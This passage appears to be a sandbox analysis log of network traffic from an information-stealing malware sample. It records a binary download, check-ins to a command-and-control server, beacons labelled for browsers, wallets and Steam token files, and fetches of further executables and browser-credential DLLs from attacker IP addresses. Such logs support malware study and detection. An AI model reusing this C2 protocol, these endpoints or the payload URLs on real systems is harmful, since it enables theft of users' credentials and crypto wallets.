Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 06:26:45 GMTContent-Type: application/octet-streamContent-Length: 2453504Last-Modified: Tue, 02 Jul 2024 04:03:03 GMTConnection: keep-aliveETag: "66837bf7-257000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f6 41 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 20 16 bd 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 bd 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 20 9c 00 91 0e 00 00 b4 2e 9c 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 78 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 40 21 00 00 f0 9b 00 00 3c 21 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAKHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 44 30 46 45 31 37 31 41 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 2d 2d 0d 0a Data Ascii: ------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="hwid"8DD0FE171AAC3343412148------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="build"jony------CFIEBKEHCAKFCBFIDAAK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 2d 2d 0d 0a Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="message"browsers------FHDAFIIDAKJDGDHIDAKJ--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="message"plugins------GDGIJECGDGCBKECAKFBG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGIJECFIEBFIDHCGHDHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 2d 2d 0d 0a Data Ascii: ------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="message"fplugins------KJDGIJECFIEBFIDHCGHD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEHHost: 85.28.47.4Content-Length: 6063Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHHost: 85.28.47.4Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFHost: 85.28.47.4Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCAHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 2d 2d 0d 0a Data Ascii: ------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="file"------CGIJKJJKEBGHJKFIDGCA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJEHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 2d 2d 0d 0a Data Ascii: ------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="file"------GHJDBAKEHDHDGCAKKJJE--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJECHost: 85.28.47.4Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEBHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 2d 2d 0d 0a Data Ascii: ------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="message"wallets------GIIJEBAECGCBKECAAAEB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHCGCGDAAKFIECFHDBHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 2d 2d 0d 0a Data Ascii: ------DBFHCGCGDAAKFIECFHDBContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------DBFHCGCGDAAKFIECFHDBContent-Disposition: form-data; name="message"files------DBFHCGCGDAAKFIECFHDB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECAHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="file"------EBGIEGCFHCFHIDHIJECA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHIHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="message"jbdtaijovg------BAKFCBFHJDHJKECAKEHI--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFBHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 44 30 46 45 31 37 31 41 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 2d 2d 0d 0a Data Ascii: ------HCAEGCBFHJDGCBFHDAFBContent-Disposition: form-data; name="hwid"8DD0FE171AAC3343412148------HCAEGCBFHJDGCBFHDAFBContent-Disposition: form-data; name="build"jony------HCAEGCBFHJDGCBFHDAFB--
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000006001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: 